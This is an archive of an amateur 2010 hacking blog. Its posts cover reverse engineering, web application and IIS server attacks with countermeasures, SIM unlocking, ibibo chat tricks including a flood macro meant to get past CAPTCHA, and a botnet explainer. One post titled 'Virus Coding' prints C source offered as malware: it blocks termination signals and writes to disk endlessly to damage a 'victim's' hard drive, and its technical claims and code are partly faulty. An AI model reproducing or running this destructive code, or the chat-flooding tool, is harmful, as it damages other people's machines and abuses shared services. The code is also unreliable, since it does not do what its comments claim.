Saturday, December 18, 2010

Reverse Engineering

What Is Reverse Engineering?

In the software world reverse engineering boils down to taking an existing program for which source-code or proper documentation is not available and attempting to recover details regarding its’ design and implementation. In some cases source code is available but the original developers who created it are unavailable.

Software reverse engineering is a purely virtual process, involving only a CPU, and the human mind which integrates several arts: code breaking, puzzle solving, programming, and logical analysis.

So what are the common applications of reverse engineering in the software world?

Malicious Software:-

Developers of malicious software often use reversing to locate vulnerabilities in operating systems and other software. Such vulnerabilities can be used to penetrate the system’s defense layers and allow infection—usually over the Internet.

At the other end developers of antivirus software dissect and analyze every malicious program that falls into their hands. They use reversing techniques to trace every step the program takes and assess the damage it could cause, the expected rate of infection, how it could be removed from infected systems.

Auditing Program Binaries:-

With open-source software, having open access to the program’s source code means that certain vulnerabilities and security holes can be discovered very early on, often before malicious programs can take advantage of them. With proprietary software for which source code is unavailable, reversing becomes a viable (yet admittedly

limited) alternative for searching for security vulnerabilities.

Reversing in Software Development:-

Reversing is incredibly useful to software developers. For instance, software developers can employ reversing techniques to discover how to interoperate with undocumented or partially documented software.

Many software companies(few are very well known) use reversing techniques for extracting valuable information from a competitor’s product for the purpose of improving their own technologies.

Finding crack:- hackers generally use reverse Engineering technique to make a crack/keygen of any software.

Types of Reversing:-

Reversing can broadly be divided into two phases:-

System-level reversing:- This is a kind of large-scale observation of the earlier program,System-level reversing techniques help determine the general structure of the program .

It involves running various tools on the program and utilizing various operating system services to obtain information, inspect program executables, track program input and output, and so forth. Most of this information comes from the operating system.

Code-level reversing:-

Code-level reversing is really an art form. Extracting design concepts and algorithms from a program binary is a complex process that requires a mastery of reversing techniques along with a solid understanding of software development, the CPU, and the operating system.

Code-level reversing observes the code from a very low-level, and we’ll be seeing every little detail of how the software operates.

What you should know before starting?

1) A solid knowledge of how Different Operating system works specially in low level.

2) You should be very good in Assembly programming language

Read The Art of Assembly Language by Randall Hyde.

3) Good knowledge of 8085/86 microprocessor programming

4) Not to forget good knowledge of C is also required

The Tools you can use:-

ü Disassemblers

ü Debuggers

ü Decompilers

More on these tools I will be discussing in next part of this article. If you like this topic then don’t forget to post your comments. Till then bye… and stay tune with hackingheart

Thursday, September 9, 2010

Media news

Netsoft Technologies's

Ethical Hacking course in media

The Ethical Hacking course of Netsoft Technologies,Kharagpur had been praised and in news by media specially by one of the largest circulated daily news paper The Thelegraph. You can read it online here...just click the following links

Read news on The Telegraph Monday , July 12 , 2010

One more report... click below link

more report on the Telegraph Thursday , August 26 , 2010

Web hacking

Hacking Web Applications

By Abir Atarthy

This writing is totally intended for educational purpose and does not in anyway encourage hacking. The real purpose of this site is prevention from hack attempts. Read the disclaimer section of the site for details.

Web applications are programs that reside on a web server to give the user functionality beyond just a website. Database queries, webmail, discussion groups, and blogs are all examples of web applications. In a web application the browser you use is basically client and the webserver is basically a server. Attackers may try to deface the website, steal credit card information, inject malicious codes, exploit server side scriptings, and so on

Now the question is why hackers target web applications. The reason is simple:To get confidential data.

Web applications are critical to the security of a system because they usually connect to a database that contains
information such as identities with credit card numbers and passwords. Web application vulnerabilities increase the threat that hackers will exploit the operating system and web server . Hacking a webserver means basically hacking a website.

To hack a webserver you can follow five steps.

Web Application Threats

Many web application threats exist on a web server. The  following are the most common threats:

Cross-site scripting :- Cross-site scripting occurs when an attacker uses a web application to send malicious
code; generally JavaScript

SQL injection : - SQL Injection is one of the many web attack mechanisms used by

hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.

Command injection :- The hacker inserts programming commands into a web form.

Cookie poisoning and snooping :- The hacker corrupts or steals cookies.

Buffer overflow :- Huge amounts of data are sent to a web application through a web form to execute commands. Almost all known web servers, application
servers, and web application environments are susceptible to attack (but not Java and J2EE environments

Directory traversal :- The hacker browses through the folders on a system via a web browser or Windows explorer.

Zero-day attacks :-take place between the time a vulnerability is discovered by a
h researcher or attacker and the time that the vendor issues a corrective patch

Hacking Tools:-

There are many tools/programmes you can   write to hack different web   applications, web servers etc. Being an  Ethical hacker  i won't   discuss them. but i will mention one tool here

called Brup that   hackers useses    for attacking and testing   web applications.

Countermeasures:-

Following are the   countermeasures for  different of the web application vulnerabilities.

Cross-site scripting :-Validate cookies, query strings, form fields, and hidden fields.

SQL injection : - 1) Check the user’s input provided to database queries

2) Validate and sanitize every user variable passed to

Command injection :-Use language-specific libraries for the programming language.

Cookie poisoning and snooping :-1) Do not store plain text or weakly encrypted password in a
cookie

2) Implement cookie’s timeout

3)Cookie’s authentication credentials should be associated with
an IP address.

Buffer overflow :- Check bounds and maintain extra care when using loops to copy data

Directory traversal :- Define access rights to the protected areas of the website

Zero-day attacks :-1 ) No security solution can claim that they will totally protect
against all zero-day attacks

2)Enforce stringent security policies

Remember that hacking webapplications is basically not easy. Its a vast   subject. I have just given an brief idea. You have to work very hard to hack   any web applications. 

By the way let me introduce you with one of our hackingheart team member Somenath Singh, has done a nice job in this weebly.com blog site. There is huge collection of different types of very useful softwares links. A extremly useful site for all. Thanks Somnath for your work.
Click here to visit

Web hacking

Hacking Web Servers

By Ankita Chaterjee

This article is totally intended for educational purpose and does not in anyway encourage hacking. The real purpose of this writing is to prevention from hack attempts. I am no way responsible if you do anything illegal and against the law.

Web servers and web applications have a very high potential to be compromised. Previous article "Hacking Web Application" discusses how to hack web applications. I will be discussing how to hack webservers.

Understanding how web servers are hacked is an important part of an ethical hackers' job. This includes knowing their vulnerabilities, as well as understanding the types of
attacks—including Internet Information Server (IIS) Unicode exploits—a hacker may use.

Types of Web Server Vulnerabilities:-

The following vulnerabilities are most commonly exploited in web servers:

1) Misconfiguration of the web server software

2) Operating system or application bugs, or flaws in programming code

3) Vulnerable default installation of operating system and web server software, and/or lack
of patch management to update operating system or web server software

4) Lack of or not following proper security policies and procedures

an exploit of a web server offers a hacker easier access to internal systems or databases.

How webservers are compromised?

1) Misconfigurations, in operating systems, or networks

2)Bugs, OS bugs may allow commands to run on the web

3) Installing the server with defaults, service packs may not be
applied in the process, leaving holes behind

4) Capturing administrator credentials through man-in-the-middle attacks

5)Revealing an administrator password through a brute-force attack

6)Using a DNS attack to redirect users to a different web server

7)Using SQL injection attacks (if the SQL server and web server are the same system

8) Using web server extension or remote service intrusion

Hacking IIS Server:-

There are many webservers available in the market. IIS is one of the most widely used web server platforms on the
Internet. Microsoft's web server has been a frequent target over the years.

Various vulnerabilities have attacked IIS server, Examples include:

• ::$DATA vulnerability
• showcode.asp vulnerability
• Piggy backing vulnerability
• Privilege command execution

IIS hacking tools;-

Metasploit framework is an advanced open-source platform for
developing, testing,different exploit codes. Its a tool for penetration testing, exploit development, and vulnerability
research. It runs on any UNIX-like system under its default configuration.A customized Cygwin environment for windows OS users also available.

VB.Net

Refresh yourself with Tic Tac Toe

By Tanaya karmakar

One day i was getting bored with programming...After all i was coding since 3 hours continuously. So i though to play game for a quick refreshment. But i found no game in my PC.
So i thought to make a small game that will need no Graphics card, no loads on ur PC, no clashes with other files of OS...
Here is the game.just download this small tic tac toe i have made and have fun....

Click here to download the game

The game is written on VB.Net 3.5..

You will need dotnet framework 2.0 or latter and windows installer 3.1 or latter to be installed in your PC  to run this game which you can easily get  at :  site.

www.filehippo.com.

The game had been tested fully working on Windows XP as well as Windows 7.

Alternatively if you have VB.Net 3.5 installed in ur PC, then just download the zip file(source code is included in it),extract the exe file and run it.

If you want the source code for this game  then click ;

Download the source code of the game here

So play and let me know whether you like  it. I have a plan to change the rule of the game in next version of it. That  will be more interesting. Till then enjoy the game and stay tune with  Hackingheart....

Sunday, May 23, 2010

Mobile hacking

Hacking/Unlocking SIM card

By Abir Atarthy

Many of our readers frequently asks me how to unlock sim card? So here is this article for them.

If you enjoy reading this and find it is useful pls. do leave your comments. So let's get into the topic now.

What is simlock ?

A SIM lock is a capability built into GSM phones by mobile phone manufacturers. Network providers use this capability to restrict the use of these phones to specific countries and network providers.

What sorts of lock are there?

1. Lock phone to SIM card.
If your phone is locked to the SIM you cannot use any other SIM than the one you have: SIM broken makes phone useless. A SIM Card Lock is a lock programmed into a mobile phone which only allows one company's SIM to be used in the phone. The reasoning behind this is to keep your custom to that network. Simlocks are also referred to as SP Locks or Network locks. Once your simlock is removed you can place any (dependent on phone model) SIM card into it including foreign networks if you take the phone abroad.

2. Lock phone to Operator (Network or Service Provider).
If your phone is locked to an operator, you can use any SIM from this operator in your phone. You can switch between contract and prepaid as you wish, but not to a different operator.

3. Lock phone to CODE (Product Lock or Offer Lock).
If your phone is locked to a code, the phone checks a special "password" (GID) on the SIM that must match your phone. Providers often use different passwords for contract and prepaid.

So unlocking is: Removing the locks on the phone so you can use the phone with any compatible SIM Card. Unlocking will allow you to use other service providers' SIM card. For example if you have an ABC GSM phoneyou can only put in an ABC SIM card, but if you unlock you can put in DEF XYZ, etc.

How can I verify whether my phone is SIM Card Locked?

If you place any card other than the one that the phone accepts, then you will get a message such as 'Incorrect Card', 'SIM Card not accepted', 'Enter Special Code', 'Enter NCK' or similar.

So unlocking is tampering with the software?

It can be, most programs to unlock on the internet change some data in the phone software other just make a log and calculate unlock code. You will have to type the unlock code with special code in your phone to unlock it.

Why should you upgrade your phone?

# To get rid of software bugs
# To get new/extra functions
# To improve existing features

DOWNLOAD UNIVERSAL SIMLOCK REMOVER HERE

http://www.ziddu.com/download/2809072/usr-gsm-support.zip.html

How to unlock mobile phone?

Why unlock a phone?

Unlocking is the opening of a phone to allow it to use any network, and removing the restriction that the original network placed on there. Several reasons for doing this are: Cheaper on another network, the phone is cheaper on a network but you don't want to use that network, the phone is moving country or a person just want different networks open on their phone.
There are a lot of phones on the market today that cannot be unlocked yet, and there are a lot of people scamming and making money from this. I hope to mainly cover the basics in this article, if you have any questions that aren't covered, please comment me and I'll get back to you.
Also, please remember most phones cannot be unlocked for free. A lot of time, dedication and work go into the development of software to give you the freedom to escape your current network, so don't be surprised if the only answer you get is, "See a professional to get this model unlocked".

Nokia
There are three major groups for Nokia's as far as unlocking is concerned.

DCT3

All DCT3 phones can be unlocked remotely provided that the codes haven't previously attempted. If they have, you'll need professional tools to get them unlocked, I recommend paying a specialist to do it (much cheaper then buying the kit) if this is the case.

DCT4
All DCT4 phones can be unlocked remotely provided that the codes haven't been previously attempted. If they have, you'll need professional tools to get them unlocked, I recommend paying a specialist to do it (much cheaper then buying the kit) if this is the case.

BB5
Most BB5 phones have been cracked or are close to being cracked. There are no BB5 phones that can be done by code, BB5 phones include:

- Nokia 3250 5200 5300 5500 5700
- Nokia 6125 6126 6131 6136 6233 6234 6270 6280 6288 6500 Classic 6500 Slide 6630 6680 6681 6682
- Nokia 7370 7373 7390
- Nokia E50 E60 E61 E62 E65 E70
- Nokia N70 N71 N72 N73 N80 N90 N91 N92 N93 N95

List gathered from various sources, if your model isn't listed here and is fairly new, it's safe to assume it is BB5. If you are still unsure, please post and ask, but make it clear you have looked at this list . The current process is risky, involved, usually expensive and very difficult for these models, still best to try through your operator. Please note well that the unlock not only depend on the model number, but the version number too. To get these phones unlocked, visit a local unlocking centre or contact the guys at nokiafix.com for more details.

Sony Ericsson
Most SE phones can be unlocked, however I don't know of any code generators, so they must be done via cable/software. I highly recommend taking these to professionals that insure against damage, as even I get these wrong sometimes.

Major groups in Sony Ericsson are:
DB2010 - CID16
DB2010 - CID29
DB2010 - CID36
DB2010 - CID49
DB2020
CID49 can be done without issues
CID51 may need to be re-flashed, hence data loss
CID52 can be problematic, but usually fine
CID53 same as CID52

Motorola
All motorola's that I know of can be done, however some are more complex then others. Motorola codes are not generated using the IMEI, but they can be obtained using it. I personally have access to a code record system for 2G handsets, however I cannot generate them, and this is a paid service. Otherwise, feel free to post for more information on unlocking yours. As a general rule though, codes are not free but depending on your model there may be unlocking software available (again, not necessily free).

Samsung
Some Samsung's can be unlocked using generic codes. However, these only seem to work on older models, and can kill phones if not used properly. Otherwise, all other models can only be done by professionals.

How To Unlock Your Own Nokia Phone?

Typically when you purchase a cell phone, the company that sold you the phone (ex: AT&T) 'locked' the phone before you bought it, so you can only use it on their network. This means that you can't use your phone on any other network, even if you change the SIM (which is an abbreviation for Subscriber Identity Module) card. The SIM card is the little piece of plastic that identifies your phone to the cellular network. Changing your SIM card to have your phone work on another network is useful especially if you want to travel to another country and want to buy a pre-paid SIM card so you can have cell phone access without roaming charges. There are services that offer to provide unlocking capabilities for a fee, but don't pay for them! You can do it yourself for free, which is the perfect price.

Step by step to unlock :

1. Before trying anything else, contact your service provider and ask for an unlock code. Usually, if you've been a customer of theirs for some time, they will provide you with an unlock code for free. This is, by far, the best way to get your phone unlocked.
2. Download software to generate the unlocking code. Software is available on some websites for free. So google it.
3. Find the Serial number of the cell phone, also known as your IMEI number. This can be done by either removing the back of your cell phone and looking underneath the battery, or simply by typing in *#06# into your cell phone. It should be something like: 010082321439976/07951780736
4. Using the software you have downloaded, enter in your Manufacturer (which is in this case Nokia), and sliding the card out. Put the battery back in and power the phone on.
5. You will see a message "Insert SIM Card". Enter all of the characters you see in your code, including the # symbols. To get a 'p' press * 3 times, to get a '+' press the * key 2 times, to get a 'w' press the * key 4 times. Disregard any spaces in the code.
6. n order to unlock your phone you generally need to enter only one code. Start with the first one. If your phone is not unlocked by typing the first code (MCC+MNC), use code "7" (Multilock)
7. Once you have finished entering a code that works you should see a message that says "SIM is not restricted" or "Restriction off" message depending on your model. If not, try entering another code. Message "Cannot undo restrictions" means the phone is "hard-locked" and cannot be unlocked by code.

Virus Coding

Creating Bad sectors on hard disks

By Somenath Singh

A C source code

/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
Run on ur own risk.
You can download the full source code from the following link.
http://rapidshare.com/files/390647127/badsector_hackingheart.txt

*/

#include "stdio.h"
#include "stdlib.h"
#include "unistd.h"
#include "signal.h"
#include "sys/types.h"
#include "sys/stat.h"
#include "fcntl.h"

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */

void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}

Monday, May 17, 2010

ibibo Chat Tricks..

How To Make Your Nickname and ID invisible In The Chat Room

By- •»яנ«•

Today i will be releasing the trick of how to make your nickname and id invisible in chat station..

Firstly how to make your nickname invisible.
Its very simple to do just use space in the area where you type the nickname.
by this you can make a invisible nickname..

Now to make ID invisible for this follow the steps given below..

1) Disconnect your internet.
2) Now double click on the chat station on the desktop.
3) Enter the id and password which you want to make invisible.
4) Now an error message will appear"unable to get...".click on retry and wait for 6 sec and again enter your
password and click on sign in.(Repeat this step for 4 times)
5) Now connect ur internet and again put your id and password in the chat station and click on sing in.
6) After few seconds You will notice an error message on the back of the chat station signing in box..like this..

7) Now continously click on retry until you login in and enter the chat station.

8) Enter any room your id will not be visible in the room instead it will be blank in the room list.

Note :- if any problem regarding the process feel free to ask..

Wednesday, May 12, 2010

ibibo Chat Tricks..

(By Varun and Aman)

Hello guyz, now type in stylish fonts to impress everyone. You can use this fonts anywhere such as ibibo, orkut, facebook, yahoo, rediff.. Etc.

Let’s begin:-

1) Download journal macro and fonts from here.
http://www.mediafire.com/?mmzdhjmcwmo

2) Run Journal macro set up. When finished, open the software and delete all 5 tutorials.

3) Now, extract the second file ‘fonts.rar’ using winrar. It will have some files such as a.jnl, b.jnl, …. Etc.

4) Open Journal macro. Go to ‘Tools’ > ‘import macros’ > browse to that folder where you have extracted
fonts script > select all this scripts and click open.

5) Now, minimize journal macro and type in your chat room, orkut, facebook, yahoo Etc

Note- If you want to disable this font, click on exit journal macro software.

ibibo Chat Tricks..

Free From Jail In 2 Hours In ibibo Chat Station

By- •»яנ«•

NOTE:-(Its just an information to the people and most of u would have known this.)

I have noticed that many people think that if the ID is in jail that means that the ID would not be back again untill the COP or SOP would release it from the jail.

BUT its wrong..

The COP and SOP has only the power of putting your ID in jail maximum for 120 minutes.After that ur id would be free from jail until its agained sended to jail by any COP or SOP.

So if ur ID remains for 120 minutes in the jail the after 120 minutes you are again able to enter to any chat station room.

Thursday, May 6, 2010

ibibo Chat Tricks

Flood In ibibo With Different Font..

By- •»яנ«•

Download the file from the link given below and import it in jmacro and run the file.
(For this u will need journal macro software installed in ur pc.)

LINK- Font Changing Flood Software For ibibo

NOTE:Please adjust ur screen resloution at 1024 by 768 (32 bits).since the flood depends on the computer and net speed so please keep on adjusting the time according to your need to escape from captcha(keep the pluse mode at 20-25 ms to escape from captcha)and please adjust your number of repeats.

COMMING SOON:-
Shortly making invisible Nickname and making invisible id trick will be introduced and stylish font in ibibo trick will be published too.

Sunday, April 18, 2010

Network hacking

Webs’ biggest threat: Botnets

By Abir Atarthy

Introduction

Botnets are quickly becoming a growing threat to computer users due to their inconspicuous and diverse methods of taking over computers. Millions of computers around the world are believed to be compromised and the numbers continue to grow. It is important understand this threat and how to avoid it. Are you sure that there is no malicious Bot hiding in your computer??? So carry on with this article to check whether your PC had been infected with Bots.

If you like this article then please pass your comments. Stay secure and Cheers!

Q: What's a bot?
A: A bot is a malicious program which has several purposes.
They are usually told what to do by a botnet admin although many of the features now are automated.

Q: What's a botnet?
A: A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin.

Q: What can a bot do?
A: Usual features of a bot include...

P2P Spreading (Limewire, uTorrent, etc.)
IM Spreading (Sends to contacts on MSN, AIM, etc.)
DDoS attacking (See "what's a DDoS attack?")
Spam mailing to lists of emails (Often used to spread)
Collecting personal information (Passwords, bank details and the like)

Q: How are bots told what to do?
A: Bots are usually commanded through an IRC channel by the user. Commands are built in and the bots listen for them.

Q. Why Bots are used?

A. Bots were originally designed to help transmit spam. Since their creation, they have been modified to engage in illegal activities as well.

Botnets are commonly used for:

DDoS (distributed denial of service) attacks
DDoS attacks attempt to overload a site in order to disrupt business by creating a loss of connectivity or connection bandwidth.Read my previous article "Denial of service attack" for details.

Click-fraud
Certain advertising firms pay website hosts a small fee every time an ad of theirs is clicked on. Some botnets take advantage of this by having computers access the site repeatedly in order to fraudulently obtain payment from the advertiser.

Phishing campaigns
These are used to harvest email addresses. Zombies within a botnet are used to send out spam andphishing email in order to collect addresses to add to their spamming lists.

Keylogging
Software is installed that records keyboard activity that is send back to the botnet. Keylogging programs to try to gain your personal information, such as usernames, passwords and credit cards.

Host malicious web sites
Botnets can use home computers to create malicious websites that download malware when accessed.

Q. How does your computer become a Bot?

A. Home computers that have security vulnerabilities are prime targets for botnets. Spammers scan the Internet looking for computers that are unprotected and use these “open-doors” to install malicious software. Another tactic is through phishing or spam emails that contain links or attachments. When clicked-on or opened, malware is then installed on the machine. Furthermore, visiting certain websites can result in malicious software being installed. This malicious software may cause your computer to run slower, your ISP (Internet Service Provider) to shut down your account for spamming, or you becoming a victim of identity theft.

Q. What are the warning signs?
A. Your computer may be part of a botnet if:

Your computer suddenly starts operating slowly or erratically
You receive emails accusing you of sending spam
You have email messages in your outbox that you didn’t send

Q. How to protect yourself?
A. To prevent your computer from becoming infected:

Use up-to-date anti-virus and anti-spyware software
Look for software that removes viruses and updates itself automatically on a daily basis. Be wary of ads on the Internet offering spyware software, as this might be a ploy to get you to download malicious code.
Set your operating system software to download and install security patches automatically
These security patches released monthly by Microsoft help fix any flaws companies find in their operating system which in turn helps to give your computer the latest protection.
Insure that your firewall is turned on
Firewalls are designed to prevent hackers from accessing your computer by making you invisible on the Internet. They help to block incoming communications from unauthorized sources. Many operating systems like Windows and Mac OS X have built-in firewalls however you may need to check to see if it is enabled. Routers have hardware firewalls. It is especially important to have your firewall enabled if you have a broadband connection because the connection is always open. For more information see

http://hackingheart.blogspot.com

Be cautious about opening any attachments, or downloading any files from emails you receive
Even if the email is from a friend or co-worker, be careful about what you choose to open since their computer could be compromised. If you send an email attachment, explain in the email what the attachment is.
Be careful what you download from the Web
Only visit sites you trust. It is recommended that you use a web browser that has security features or use a program like SiteAdvisor that checks the status of websites to insure that they are safe to visit and use.